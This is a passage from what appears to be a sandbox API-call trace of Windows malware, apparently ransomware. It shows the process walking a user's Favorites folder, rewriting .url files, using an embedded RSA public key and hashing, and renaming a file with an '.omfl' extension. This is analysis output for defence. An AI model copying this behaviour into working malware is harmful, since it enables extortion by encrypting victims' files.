(HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.721] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.721] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.722] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.722] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.722] CloseHandle (hObject=0x610) returned 1 [0132.724] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0c20 [0132.724] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.omfl")) returned 1 [0132.741] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0132.741] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0132.741] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.741] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.741] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0132.741] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0132.741] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.741] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.742] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.742] PathFindFileNameW (pszPath="") returned="" [0132.742] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0132.743] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.743] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0132.743] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0132.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.744] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0132.744] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.747] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.747] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.748] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x85, lpOverlapped=0x0) returned 1 [0132.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.748] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.763] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.763] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.763] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.764] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.764] GetLastError () returned 0x0 [0132.764] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.764] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.764] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.764] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.765] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.765] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.765] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0132.765] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.765] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbd48 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17490 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbd90 [0132.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174a8 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174d8 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174f0 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.766] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174d8 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174f0 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174f0 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd174d8 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0132.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174f0 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174d8 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.766] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.767] GetCurrentThreadId () returned 0x618 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579e60 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.767] GetCurrentThreadId () returned 0x618 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.767] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174d8 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174f0 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174c0 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17508 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174d8 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174d8 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.768] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174d8 | out: hHeap=0x4970000) returned 1 [0132.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17508 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174f0 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174a8 | out: hHeap=0x4970000) returned 1 [0132.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbd90 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) 